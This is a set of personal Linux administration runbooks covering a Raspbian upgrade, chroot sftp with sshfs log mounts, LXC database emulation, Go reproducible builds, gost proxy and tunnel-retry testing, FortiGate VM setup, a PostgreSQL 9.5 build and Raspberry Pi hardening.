upgrade raspbian from buster to bullseye

DESCRIPTION

Upgrade Raspbian from buster to bullseye. Buster was released in 2019.
Pre-change: back up any required files that are not already backed up or documented.

Reference: https://www.tomshardware.com/how-to/upgrade-raspberry-pi-os-to-bullseye-from-buster

COMMANDS

sudo -i
tmux
apt update
apt dist-upgrade
apt autoremove
apt autoclean
reboot
grep -r buster  /etc/apt/*
vi /etc/apt/sources.list
deb http://raspbian.raspberrypi.org/raspbian/ bullseye main contrib non-free rpi
deb-src http://raspbian.raspberrypi.org/raspbian/ bullseye main contrib non-free rpi

vi /etc/apt/sources.list.d/raspi.list
deb http://archive.raspberrypi.org/debian/ bullseye main
deb-src http://archive.raspberrypi.org/debian/ bullseye main
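
Optionally, instead of editing each file by hand, the same change can be made with sed (a sketch; it assumes only these two files reference buster, so re-run the grep above afterwards to confirm):

sed -i 's/buster/bullseye/g' /etc/apt/sources.list /etc/apt/sources.list.d/raspi.list
grep -r bullseye /etc/apt/*   # confirm the sources now point at bullseye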
  • When prompted to restart services during the upgrade, answer Yes.

  • Keep existing configuration files when prompted:
    ‘keep currently installed version?’ - answer Yes (or O)

apt update
apt dist-upgrade

apt autoremove
apt autoclean
reboot

ERRORS

If ssh access hangs and there is no network or ssh access, restart, log in via
the console and try ‘dpkg --configure -a’.
If all else fails, re-image bullseye onto the sdcard and follow the runbook/RFC to
set up the device.
Copy files from the backup.

VERIFICATION

cat /etc/issue
Raspbian GNU/Linux 11 \n \l
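
As an additional check (standard file locations assumed), confirm the OS release and the running kernel:

grep PRETTY_NAME /etc/os-release   # should report something like: Raspbian GNU/Linux 11 (bullseye)
uname -a                           # confirm the expected kernel is running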

access sshfs mount via sftp chroot account

DESCRIPTION

  • set up a basic ssh server/client to share files in read-only mode
  • create a chroot user with sftp-only access to the mounted file system

ERRORS

COMMANDS

  • install: on server sharing files

openssh-server - secure shell (SSH) server, for secure access from remote machines

  • install: on client system mounting remote file

sshfs - filesystem client based on SSH File Transfer Protocol
openssh-client - secure shell (SSH) client, for secure access to remote machines

  • mounts are done by an unprivileged user; that user must use the following to unmount:
fusermount -u /home/user/mnt
  • create chroot user
mkdir /home/this_userlogs
groupadd this_userlogs
useradd -d /home/this_userlogs -M -g this_userlogs -s /bin/rbash this_userlogs
chown root:root /home/this_userlogs
chmod 0755 /home/this_userlogs
  • check user
id this_userlogs
uid=1016(this_userlogs) gid=1001(this_userlogs) groups=1001(this_userlogs)

grep this_userlogs /etc/passwd
this_userlogs:x:1016:1001::/home/this_userlogs:/bin/sh
  • create folder structure to hold files
mkdir /home/this_useruser /home/this_useruser/.ssh /home/this_useruser/bin
chown -R this_useruser:root /home/this_useruser
chmod 0500 /home/this_useruser
chmod 0700 /home/this_useruser/.ssh

mkdir /home/this_userlogs/app1_logs
mkdir /home/this_userlogs/app2_logs
mkdir /home/this_userlogs/app3_logs
chown this_userlogs:root /home/this_userlogs/app1_logs
chown this_userlogs:root /home/this_userlogs/app2_logs
chown this_userlogs:root /home/this_userlogs/app3_logs
chmod 0700 /home/this_userlogs/app1_logs
chmod 0700 /home/this_userlogs/app2_logs
chmod 0700 /home/this_userlogs/app3_logs
  • create the mount scripts and ssh keys
su - this_userlogs
cd /home/this_useruser/bin
  • sshfs mount scripts

  • app1-logs

#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

PATH=/bin:/usr/bin

LDIR="/home/this_userlogs/app1_logs"
RDIR="/opt/MGW/app1/logs"

COMM="this_userlogs@x.x.x.x"
ARG="-o ro,reconnect,ServerAliveInterval=15,ServerAliveCountMax=3 -o IdentityFile=/home/this_useruser/.ssh/id_rsa -o StrictHostKeyChecking=no"

mount | grep "${LDIR}" >/dev/null 2>&1 ||sshfs ${ARG} ${COMM}:${RDIR} ${LDIR}
  • app2-logs
#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

PATH=/bin:/usr/bin

LDIR="/home/this_userlogs/app2_logs"
RDIR="/opt/MGW/app2/apache-tomcat-9.0.54/logs"

COMM="this_userlogs@x.x.x.x"
ARG="-o ro,reconnect,ServerAliveInterval=15,ServerAliveCountMax=3 -o IdentityFile=/home/this_useruser/.ssh/id_rsa -o StrictHostKeyChecking=no"

mount | grep "${LDIR}" >/dev/null 2>&1 ||sshfs ${ARG} ${COMM}:${RDIR} ${LDIR}
  • app3-logs
#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

PATH=/bin:/usr/bin
LDIR="/home/this_userlogs/app3_logs"
RDIR="/opt/MGW/app1/remoteStorage"

COMM="this_userlogs@x.x.x.x"
ARG="-o ro,reconnect,ServerAliveInterval=15,ServerAliveCountMax=3 -o IdentityFile=/home/this_useruser/.ssh/id_rsa -o StrictHostKeyChecking=no"

mount | grep "${LDIR}" >/dev/null 2>&1 ||sshfs ${ARG} ${COMM}:${RDIR} ${LDIR}
  • /usr/local/bin/mount-logs-this_useruser
#! /bin/bash
set -o pipefail
set -o errexit
set -o nounset

nc -w 20 -v -z x.x.x.x 22 >/dev/null 2>&1 || exit

if [ "$(id -n -u)" != "this_userlogs" ]; then
    exit 1
fi

/home/this_useruser/bin/app1-logs
/home/this_useruser/bin/app2-logs
/home/this_useruser/bin/app3-logs
  • /etc/cron.d/mount-logs-this_useruser
@reboot     this_userlogs /usr/local/bin/mount-logs-this_useruser
*/8 * * * * this_userlogs /usr/local/bin/mount-logs-this_useruser
  • ssh keys
su - this_userlogs
cd /home/this_useruser/.ssh
ssh-keygen -f id_rsa

Copy .ssh/id_rsa.pub to rs01 server under appropriate user keys -
app1_user & app2_user
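
One way to do this (a sketch; it assumes password authentication is still enabled for those accounts on rs01) is ssh-copy-id:

ssh-copy-id -i /home/this_useruser/.ssh/id_rsa.pub app1_user@rs01
ssh-copy-id -i /home/this_useruser/.ssh/id_rsa.pub app2_user@rs01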

  • Add to end of: /etc/ssh/sshd_config
# override default of no subsystems
# Subsystem sftp /usr/lib/openssh/sftp-server
Subsystem sftp internal-sftp

Match User this_userlogs
ChrootDirectory %h
ForceCommand internal-sftp
AllowTCPForwarding no
X11Forwarding no

## access to the system cannot be restricted to the sftp command or rbash, as
## folder traversal is required
#Match User app1_user
# ChrootDirectory %h
# ForceCommand internal-sftp
# AllowTCPForwarding no
# X11Forwarding no
  • check sshd: /usr/sbin/sshd -t
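
If the check passes, reload sshd so the Match block takes effect (the service name on Raspbian/Debian is assumed to be ssh):

/usr/sbin/sshd -t && systemctl reload ssh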

VERIFICATION

sftp this_userlogs@y.y.y.y
Connected to y.y.y.y
sftp> cd /etc
Couldn't stat remote file: No such file or directory
sftp> ls
app1_logs app2_logs app3_logs
sftp> cd app2_logs/
sftp> ls
sftp> put /etc/hosts
Uploading /etc/hosts to /app2_logs/hosts
remote open("/app2_logs/hosts"): Failure
sftp>

emulate primary secondary databases using linux containers

DESCRIPTION

Attempt to emulate production databases using linux containers.
This can be used to test database takeover, replication settings, performance,
etc.

ERRORS

VERIFICATION

COMMANDS

sudo apt install lxc lxc-templates lxc-utils cgroup-tools

sudo lxc-create -n db1 -t ubuntu -- -r focal -u test --password welcome
sudo lxc-create -n db2 -t ubuntu -- -r focal -u test --password welcome

set memory limit on container

cgroup settings will not work unless lxcfs is installed.

sudo apt install lxcfs


<https://github.com/lxc/lxc/issues/2845>

Hi, after install lxcfs, the free command in lxc container show the correct memory now,
Thanks.

https://serverfault.com/questions/762598/will-linux-ubuntu-running-in-an-lxc-container-understand-cgroup-memory-limits


In PRD a database node - KVM - is allocated 1 CPU and 2 GB RAM.
Options: Create a KVM with 1 CPU and 2GB RAM or run container with memory and
CPU restriction.

Emulate containers with 1 CPU and 512MB RAM.

Testing

sudo lxc-cgroup -n db1 memory.soft_limit_in_bytes 536870912
sudo lxc-cgroup -n db1 memory.limit_in_bytes 536870912

sudo lxc-cgroup -n db1 cpuset.cpus 0
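
To confirm the limits took effect, a quick check (a sketch; it assumes the cgroup v1 names used above, and lxcfs for correct numbers inside the container):

sudo lxc-cgroup -n db1 memory.limit_in_bytes   # print the current limit
sudo lxc-attach -n db1 -- free -m              # memory as seen inside the container
sudo lxc-attach -n db1 -- nproc                # CPUs visible inside the container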


Permanent

sudo vi /var/lib/lxc/db1/config


lxc.cgroup.memory.limit_in_bytes = 536870912
lxc.cgroup.memory.max_usage_in_bytes = 536870912

lxc.cgroup.cpuset.cpus = 0


Start the containers

sudo lxc-start -n db1 # 10.0.3.11
sudo lxc-start -n db2 # 10.0.3.111
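
To check the containers are running and reachable (the addresses in the comments above are examples), list them and attach:

sudo lxc-ls -f            # state, autostart and IP addresses per container
sudo lxc-attach -n db1    # open a shell inside db1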


golang setup and testing

DESCRIPTION

Go and Reproducible Builds

Install the Go compiler and write a few small programs to get familiar
with the language.

The build output should be byte for byte reproducible from the inputs so
we can recreate binaries and trace their provenance.

COMMANDS

Install asdf

sudo apt install --no-install-recommends git curl

git clone https://github.com/asdf-vm/asdf.git ~/.asdf
echo -e '\n. $HOME/.asdf/asdf.sh' >> ~/.profile
echo -e '\n. $HOME/.asdf/completions/asdf.bash' >> ~/.profile
. ~/.profile

asdf

Install the Go Compiler

asdf plugin add golang
asdf list-all golang
asdf install golang 1.17.4

asdf global golang 1.17.4
asdf local golang 1.17.4

asdf plugin add golangci-lint
asdf list-all golangci-lint
asdf install golangci-lint 1.43.0
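
Quick sanity check that the tools are on the PATH and at the expected versions:

go version               # expect go1.17.4
golangci-lint --version  # expect 1.43.0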

Write a Test Program

mkdir test
cd test
go mod init test
  • In an editor, create main.go:
vi main.go
  • With contents:
package main

import (
	"fmt"
	"os"
)

func main() {
	fmt.Fprintln(os.Stderr, "test")
}
  • Initialize a git repository
git init

# add .gitignore from: https://github.com/github/gitignore/blob/master/Go.gitignore
git add .

# sign your commits
git commit -S
  • Ensure the files are properly formatted:
go fmt main.go
git diff
  • Compile the program
go build
  • Run the program
./test
  • Compile the program as a reproducible build: investigate the differences
    between the binaries

  • CGO_ENABLED=0: disable use of libc, use pure Go

  • -trimpath: remove local file system paths from the compiled binary and stack traces

  • -ldflags "-s -w": reduce binary size by stripping the symbol table and debug information

CGO_ENABLED=0 go build -trimpath -ldflags "-s -w"
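
A simple way to check reproducibility (a sketch; the output names test.1 and test.2 are arbitrary): build twice and compare the hashes, which should be identical.

CGO_ENABLED=0 go build -trimpath -ldflags "-s -w" -o test.1
CGO_ENABLED=0 go build -trimpath -ldflags "-s -w" -o test.2
sha256sum test.1 test.2   # identical hashes => reproducible build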
  • Run the linters
golangci-lint run

golangci-lint run --enable-all

Programs

Write the following programs. We can review during the meeting.

  1. env(1)

    Create a program which lists environment variables as ‘=’ delimited
    key/value pairs:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=e6a0557d8a1b
  1. ip(1)

    Create a program which lists information about network interfaces:

    • interface name
    • MAC address
    • IP addresses
{Index:1 MTU:65536 Name:lo HardwareAddr: Flags:up|loopback}
[127.0.0.1/32]

ERRORS

VERIFICATION

gost proxy on raspberry-pi

DESCRIPTION

web proxy for ubuntu.
no caching.
no filtering.

ERRORS

VERIFICATION

COMMANDS

System changes

gost proxy: Compile using go

git clone https://github.com/ginuerzh/gost.git
cd gost/cmd/gost
env GOOS=linux GOARCH=arm CGO_ENABLED=0 go build -trimpath -ldflags "-s -w"
sftp sba161
put gost
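
On the Pi, place the binary somewhere on the service's search path (the location is an assumption - /usr/local/bin here; if a different path is used, set ExecStart in the unit below to the full path):

# copy the uploaded binary into place and make it executable
install -m 0755 gost /usr/local/bin/gost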

setup to start as a systemd service

cat /lib/systemd/system/gostproxy.service

[Unit]
Description=gostproxy
After=network.target

[Service]
ExecStart=gost -L=:8080
User=_gostproxy
Restart=always
KillMode=process
#Hardening

PrivateTmp=true

#CapabilityBoundingSet=CAP_SETGID CAP_SETUID CAP_NET_BIND_SERVICE
#AmbientCapabilities=CAP_NET_BIND_SERVICE
#SecureBits=noroot-locked

ProtectSystem=strict
ProtectHome=true
ProtectKernelModules=true
ProtectKernelTunables=true
ProtectControlGroups=true
MountFlags=private
NoNewPrivileges=true
PrivateDevices=true
RestrictAddressFamilies=AF_INET AF_INET6

MemoryDenyWriteExecute=true
#DynamicUser=true

[Install]
WantedBy=multi-user.target
cp  /lib/systemd/system/gostproxy.service  /etc/systemd/system/
useradd -s /usr/sbin/nologin _gostproxy -d /run/_gostproxy
systemctl daemon-reload
systemctl start gostproxy
systemctl status gostproxy
systemctl enable gostproxy
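
A quick functional test from a client on the network (the host name sba161 is taken from the sftp step above; substitute the Pi's address):

curl -x http://sba161:8080 -I http://example.com   # expect an HTTP response header via the proxy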

testing gost tunnels retry parameter

DESCRIPTION

gost: getting started

Retries - The number of retries after a failed connection through the proxy chain.

gost: code: chain.go

func (c *Chain) DialContext(ctx context.Context, network, address string, opts ...ChainOption) (conn net.Conn, err error) {
	..
	..
	for i := 0; i < retries; i++ {
		conn, err = c.dialWithOptions(ctx, network, address, options)
		if err == nil {
			break
		}
	}
	..

Test the ‘retry’ parameter on tunnels with a single or multiple failing chain
node.

Observations:

With the default ‘Retries: 1’, a single failing node causes the 1st connection
attempt to always fail; the 2nd attempt works.
With ‘Retries: 2’, a single failing node in a chain leg does not cause the 1st
attempt to fail.

The script below creates a test environment as follows.

Backend echo server - 127.0.0.100:9000 (netcat listener).
Backend terminating gost tunnel end point for the server - 127.0.0.100:8443.

2 legs - chain nodes - 127.1.0.x:8443 and 127.2.0.x:8443.
These can be considered as the site 1 and site 2 networks.

Client: gost terminating end point - 127.0.0.200:9000, forwarding to the backend.
Client test: use netcat against 127.0.0.200:9000 to reach the backend server.

ERRORS

VERIFICATION

Create a folder.
Run the script (see COMMANDS below).
The script creates all the scripts required to run the tests.

Testing:

mkdir /tmp/t
cd /tmp/t
create-gost-tunnel-test-env
  • console 1 - start backend server and all chain nodes (both legs)
cd /tmp/t
./start-srv-backend-and-chains
  • console 2 - start client end point
cd /tmp/t
./start-client
  • console 3 - run basic test - all chain nodes are up
cd /tmp/t
./client-test
  • Failing chain node tests
  • One chain node failing, retry - defaults to 1
cd /tmp/t
./start-client-leg-1-node-1-fail
  • 1st attempt always fails, 2nd attempt works
cd /tmp/t
./client-test
  • One chain node failing, retry set to 2
cd /tmp/t
./start-client-leg-1-node-1-fail-retry-2
  • 1st attempt does not fail
cd /tmp/t
./client-test
  • See other 2 tests for further testing
  • Other tests could be added

COMMANDS

  • create-gost-tunnel-test-env
#! /bin/bash

rm -rf service client
mkdir service

for i in $(seq 8); do
mkdir service/$i
done

for i in 1 2 3 4; do
cat >service/$i/run <<EOF
#! /bin/bash
exec gost -L=127.1.0.$i:8443
EOF
done

for i in 5 6 7 8; do
cat >service/$i/run <<EOF
#! /bin/bash
exec gost -L=127.2.0.$i:8443
EOF
done

for i in 1 2 3 4 5 6 7 8; do
chmod +x service/$i/run
done

mkdir service/srv
cat >service/srv/run<<EOF
#! /bin/bash
exec nc -vlk 127.0.0.100 9000
EOF

mkdir service/srv_end
cat >service/srv_end/run<<EOF
#! /bin/bash
exec gost -L 127.0.0.100:8443
EOF

chmod +x service/srv_end/run
chmod +x service/srv/run

mkdir client
cat >client/aok.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.1:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.6:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client<<EOF
#! /bin/bash
gost -C client/aok.json
EOF
chmod +x start-client

cat >start-srv-backend-and-chains<<EOF
#! /bin/bash
svscan service
EOF
chmod +x start-srv-backend-and-chains

cat >client-test<<EOF
#! /bin/bash
nc -v 127.0.0.200 9000
EOF
chmod +x client-test

###############################################################################
# simulate mutations to chainnodes
# options: use svc -d
# or restart client with rogue (non-existent chain nodes)
# run client tests again
###############################################################################

# Retries = 1, leg 1, node 1 - fail (add a non-existing node - 127.1.0.11)

cat >client/leg-1-node-1-fail.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.6:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-fail<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-fail.json
EOF
chmod +x start-client-leg-1-node-1-fail

# Retries = 1, leg 1, node 1, leg 2, node 2 - fail (add a non-existing node in each leg)

cat >client/leg-1-node-1-leg-2-node-2-fail.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail

# Retries = 2, leg 1, node 1 - fail

cat >client/leg-1-node-1-fail-retry-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 2,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.6:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-fail-retry-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-fail-retry-2.json
EOF
chmod +x start-client-leg-1-node-1-fail-retry-2

# Retries = 2, leg 1, node 1, leg 2, node 2 - fail

cat >client/leg-1-node-1-leg-2-node-2-fail-retry-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 2,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail-retry-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail-retry-2.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail-retry-2

# Retries = 1, leg 1, node 1, leg 2, node 2 - fail - have 2 additional working chain nodes per leg

cat >client/leg-1-node-1-leg-2-node-2-fail-additional-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443,127.1.0.3:8443,127.1.0.4:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443,127.2.0.7:8443,127.2.0.8:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail-additional-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail-additional-2.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail-additional-2

# Retries = 2, leg 1, node 1, leg 2, node 2 - fail - have 2 additional working chain nodes per leg

cat >client/leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 2,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443,127.1.0.3:8443,127.1.0.4:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443,127.2.0.7:8443,127.2.0.8:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2
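
An alternative way to simulate a chain node failure, instead of pointing at a non-existent address, is to stop one of the supervised nodes (this assumes daemontools, which provides the svscan used by start-srv-backend-and-chains):

svc -d service/1   # take chain node 1 down
svc -u service/1   # bring it back up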

References

fortigate evaluation virtual machine setup

DESCRIPTION

Register and download image from
https://support.fortinet.com/Download/VMImages.aspx

select product - fortigate
select platform - KVM

latest version - 6.4.3 (2020-12-10)

New deployment of FortiGate for KVM

FGT_VM64_KVM-v6-build1778-FORTINET.out.kvm.zip (66.86 MB)

Evaluation - 15 days per install.

Install KVM - kernel virtual machine - software on Ubuntu

https://help.ubuntu.com/community/KVM/Installation

COMMANDS

cp FGT_VM64_KVM-v6-build1778-FORTINET.out.kvm.zip /tmp
cd /tmp
unzip FGT_VM64_KVM-v6-build1778-FORTINET.out.kvm.zip
sudo mv fortios.qcow2 /var/lib/libvirt/images/

sudo virt-manager

File -> New Virtual Machine -> Install existing disk image (last option)

Select - /var/lib/libvirt/images/fortios.qcow2

Forward
Forward (Memory/CPUs) - use defaults (see below)

Name - FGT_VM64_KVM-v6-build1778-FORTINET

Finish

Click the VM display and you should see a console.

Default login:

admin
NOPASSWORD - enter

Set a password

Failure: setting up a management IP

config system interface
edit port1
set mode static
set ip 192.168.0.100 255.255.255.0
next
end

ERRORS

on ‘next’

Attribute 'vdom' MUST be set.
Command fail. Return code 1

Steps to avoid this error and get a management IP

Pitfalls: Undocumented

  • ‘set vdom "root"’ - to avoid
Attribute 'vdom' MUST be set.
Command fail. Return code 1
  • ‘set type aggregate’ to avoid
"Attribute 'interface' MUST be set.
Command fail. Return code 1"
config system interface
edit "port1"
set vdom "root"
set mode static
set ip 192.168.0.100 255.255.255.0
set allowaccess ping ssh http
set type aggregate
next
end
  • Ensure the DNS servers are set to bogus values - the VM will attempt to reach
    fortinet and update
config system dns
set primary 192.168.0.66
set secondary 192.168.0.67
end
config router static
edit 1
set gateway 192.168.0.1
set device "port1"
next
end
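
With port1 configured, a quick reachability check from the KVM host (addresses are the ones used in the examples above):

ping -c 3 192.168.0.100       # management IP should answer
curl -I http://192.168.0.100  # http management GUI (no https on the evaluation image)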

Important notes:

  • The setup will fail if these settings are not correct
  • The license is limited to 1 CPU and the memory limit noted below when initializing the VM
  • No https management GUI (http only)

Documented

Memory 1024MB
Single CPU

Undocumented

Ensure the libvirt-manager has the network interface set to ‘virtio’ for the VM

VDOM creation: Limited to split VDOM due to evaluation license

config system global
set vdom-mode multi-vdom
end
FortiGate-VM64-KVM # config system global

FortiGate-VM64-KVM (global) # set vdom-mode multi-vdom
multi-vdom mode cannot be enabled with the current vdom license.
node_check_object fail! for vdom-mode multi-vdom

value parse error before 'multi-vdom'
Command fail. Return code -651

Option to use in evaluation copy: Use split task VDOM

config system global
set vdom-mode split-vdom
end
  • Message:
Some settings (e.g., firewall policy/object, security profile, wifi/switch controller, user, device, dashboard)
in vdom "root" will be deleted, a split-task vdom "FG-traffic" will be created, and you will be logged out for the operation to take effect.
Do you want to continue? (y/n)

This will cause you to log into the new split non-root VDOM, where the ‘config system’
command set will not be available.
(https://forum.fortinet.com/tm.aspx?m=180832)

ssh admin@192.168.1.1

config system global
8258: Unknown action 3
Command fail. Return code -1

VERIFICATION

References

https://docs.fortinet.com/document/fortigate/6.4.0/fortigate-virtualization -> virtualization
https://docs.fortinet.com/vm -> External link to PDF
https://docs.fortinet.com/vm/kvm/fortigate/6.4/kvm-cookbook/6.4.0/388201/deployment

Initial settings and configuring port1:
https://docs.fortinet.com/vm/kvm/fortigate/6.4/kvm-cookbook/6.4.0/615472/configuring-port-1

https://docs.fortinet.com/document/fortigate/6.4.4/administration-guide/498634/using-the-cli

https://docs.fortinet.com/document/fortigate/6.4.0/administration-guide/575766/multi-vdom-configuration-examples
https://docs.fortinet.com/document/fortigate/6.2.3/cookbook/758820/split-task-vdom-mode

self contained postgresql 9.5

DESCRIPTION

compile and package postgresql 9.5

ERRORS

VERIFICATION

Compare database backups: before and after.

COMMANDS

#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

rm -rf /tmp/build
mkdir /tmp/build
rm -rf /tmp/bin
mkdir /tmp/bin

cd /tmp/build
wget https://www.openssl.org/source/openssl-1.0.2n.tar.gz
tar xzf openssl-1.0.2n.tar.gz
cd openssl-1.0.2n
./config --prefix=/tmp/bin/openssl -fPIC -shared
make
make install

cd /tmp/build
apt source libreadline-dev
cd readline6-6.3
./configure --prefix=/tmp/bin/libreadline
make
make install

cd /tmp/build
apt-get source postgresql-9.5
cd postgresql-9.5-9.5.25/
CFLAGS="-Wl,-rpath=/tmp/bin/openssl/lib,-rpath=/tmp/bin/libreadline/lib" \
./configure --prefix=/tmp/bin/pgsql \
--with-openssl \
--with-includes=/tmp/bin/openssl/include:/tmp/bin/libreadline/include \
--with-libraries=/tmp/bin/openssl/lib:/tmp/bin/libreadline/lib
make
make install
cp /lib/x86_64-linux-gnu/libtinfo.so.5 /tmp/bin/pgsql/lib

cd contrib
make
make install

cd /tmp/build
git clone https://github.com/Tarsnap/spiped.git
cd spiped/
CFLAGS="-I/tmp/bin/openssl/include -I/tmp/bin/libreadline/include" \
LDFLAGS="-L/tmp/bin/openssl/lib -L/tmp/bin/libreadline/lib" \
make

#md5sum /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 /tmp/bin/lib/libcrypto.so.1.0.0
#f6cf59390dd79203fd2122a6d15ec0a5 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
#f6cf59390dd79203fd2122a6d15ec0a5 /tmp/bin/lib/libcrypto.so.1.0.0

mkdir /tmp/bin/lib
cp /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 /tmp/bin/lib/

tar -czf /tmp/pg95.tgz /tmp/bin
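
A sketch of using the package on a target host; it assumes the archive is unpacked back to the /tmp/bin prefix used above and that initdb is run as a non-root user (the /tmp/pgdata data directory is an arbitrary example):

tar -xzf pg95.tgz -C /                      # restores tmp/bin/... under /
/tmp/bin/pgsql/bin/initdb -D /tmp/pgdata
/tmp/bin/pgsql/bin/pg_ctl -D /tmp/pgdata -l /tmp/pgdata/logfile start
/tmp/bin/pgsql/bin/psql -d postgres -c 'select version();'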

Monitoring

raspberry pi base setup

DESCRIPTION

Configuration changes to make on new raspberry pi - raspbian systems.

ERRORS

VERIFICATION

COMMANDS

System changes

  • Disable unused services that are enabled by default
systemctl disable hciuart.service
systemctl disable bluealsa.service
systemctl disable bluetooth.service
  • Add to section [all] in /boot/config.txt
  • dtoverlay=disable-bt
grep disable-bt /boot/overlays/README
Name: disable-bt
Load: dtoverlay=disable-bt
Name: pi3-disable-bt
Info: This overlay has been renamed disable-bt, keeping pi3-disable-bt as an
  • disable wifi
  • Add to section [all] in /boot/config.txt
  • dtoverlay=disable-wifi
grep disable-wifi /boot/overlays/README
Name: disable-wifi
Load: dtoverlay=disable-wifi
Name: pi3-disable-wifi
Info: This overlay has been renamed disable-wifi, keeping pi3-disable-wifi as
systemctl disable avahi-daemon.service
systemctl stop avahi-daemon.service

FIXME:

systemctl disable wpa_supplicant
  • Had to move hook to disable wpa_supplicant process on reboots
mv /lib/dhcpcd/dhcpcd-hooks/10-wpa_supplicant /root 
  • Ignore recommends/suggests when installing software

  • /etc/apt/apt.conf

APT::Install-Recommends "0";
APT::Install-Suggests "0";
Dpkg::Options {
"--force-confdef";
"--force-confold";
}
  • System Update and upgrade
apt update
apt dist-upgrade
  • sysctl settings

  • /etc/sysctl.d/90-vm-disable-oom-killer.conf

# Disable OOM killer
vm.overcommit_memory=2
vm.overcommit_ratio=90
  • /etc/sysctl.d/90-disable-perf-event.conf
# -1: Allow use of (almost) all events by all users
# >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
# >=1: Disallow CPU event access by users without CAP_SYS_ADMIN
# >=2: Disallow kernel profiling by users without CAP_SYS_ADMIN
# >=3: Disallow all event access by users without CAP_SYS_ADMIN
#
# https://lwn.net/Articles/696216/
#
kernel.perf_event_paranoid=3
  • /etc/sysctl.d/90-coredumps-restricted-directory.conf
kernel.core_pattern = /var/core/core_%h_%e_%u_%g_%t_%p
mkdir /var/core
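
The new sysctl files can be loaded without a reboot:

sysctl --system   # re-read all files under /etc/sysctl.d and apply them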
  • Default profile

  • /etc/profile.d/login.sh

export EDITOR=vi
set -o vi
export TMOUT=900
readonly TMOUT
  • /etc/hosts
127.0.0.1       localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
  • Install editor
apt install vim-nox
  • vim for root

  • root/.vimrc

syntax on
  • Install autoupdates for patch management
apt install unattended-upgrades
dpkg-reconfigure unattended-upgrades
  • change in /etc/apt/apt.conf.d/50unattended-upgrades
Unattended-Upgrade::Origins-Pattern {
"origin=Debian,codename=${distro_codename},label=debian";
"origin=Debian,codename=${distro_codename},label=Debian-Security";

"origin=Raspbian,codename=${distro_codename},label=Raspbian";
"origin=Raspberry Pi Foundation,codename=${distro_codename},label=Raspberry Pi Foundation";
};

Unattended-Upgrade::Package-Blacklist {
};

Unattended-Upgrade::AutoFixInterruptedDpkg "true";
Unattended-Upgrade::MinimalSteps "true";
Unattended-Upgrade::InstallOnShutdown "false";
Unattended-Upgrade::Remove-Unused-Kernel-Packages "true";
